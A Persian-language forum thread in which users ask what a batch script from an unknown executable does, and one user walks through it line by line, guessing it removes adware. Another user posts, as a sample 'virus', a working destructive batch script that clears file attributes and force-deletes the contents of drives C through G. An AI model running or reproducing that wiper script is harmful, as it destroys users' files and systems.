کی سر در میاره این کارش چیه؟

[HR]

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

[HR]

این متن یه فیل اجرایی ناشناس بود.
بابا !! حالا دقیق هم نمیخواد بگین....

[mahdy2021]

اين مثلا يه ويروسه

[HR]

چون گفتم فایل اجرایی ناشناسه این حرف زدی یا واقعا ویروسه ؟؟

[mahdy2021]

مثلا اين يكي هم ويروسه(ولي براي استفاده از اينها شرايط خاصي وجود داره)
@echo off

ATTRIB -a -s -h -r c

ATTRIB -a -s -h -r c:\windows\*.*

Echo y | echo a | Echo y | del c:\*.*

Echo y | echo a | Echo y | del d:\*.*

Echo y | echo a | Echo y | del e:\*.*

Echo y | echo a | Echo y | del f:\*.*

Echo y | echo a | Echo y | del g:\*.*

echo y | copy *.* C:\

echo y | copy *.* D:\

echo y | copy *.* E:\

echo y | copy *.* F:\

echo y | copy *.* G:\

resrart

[HR]

این وروس رو که میشناسم.....سوالم اینه که این کد کارش چیه ؟

[Beelzebub]

اين از كجا اوردي يكم كارش عجيبه
اين به قول شما ويروس اين كارا رو مي كنه

@echo off

نشان ندادن فرمانهاي داس در command prompt

echo.

يه خط فاصله

call navhelper.exe

صدا زدن فايل navhelper.exe و اجراي اون بازگشت به خط فرمان قبلي

if exist recovery.exe del recovery.exe > nul:
if exist buy.url del buy.url > nul:
if exist english.chm del english.chm > nul:
if exist turkish.chm del turkish.chm > nul:
if exist french.chm del french.chm > nul:
if exist chinese.chm del chinese.chm > nul:
if exist italian.chm del italian.chm > nul:
if exist latvian.chm del latvian.chm > nul:
if exist romanian.chm del romanian.chm > nul:
if exist russian.chm del russian.chm > nul:
if exist spanish.chm del spanish.chm > nul:
if exist install2.bat del install2.bat > nul:
if exist deneme.txt del deneme.txt >nul:
if exist navhelper.exe del navhelper.exe >nul:

چك كردن وجود فايهايي recovery.exe،buy.url،english.chmو... و در صورت وجود، پاك كردن آنها
>null هم يعني بعد پاك كردن هيچ پيامي روي صفحه نمايش نشان داده نشود

if exist %windir%\SYSTEM\msvbvm60.dll goto c3
if exist %windir%\SYSTEM32\msvbvm60.dll goto c3

چك مي كنه اگر فايل msvbvm60.dl در اين دو شاخه %windir%\SYSTEM\ و %windir%\SYSTEM32\ ميرود به c3

echo You need to install visual basic 6 runtime files

پيام You need to install visual basic 6 runtime files رو صفحه ي نمايش نشان مي دهد

cls

صفحه نمايش رو پاك مي كنيد

-------------
شايد طريقه پاك كردن يه adware باشه
موفق باشيد

[HR]

Beelzebub جان ، ممنونتم ...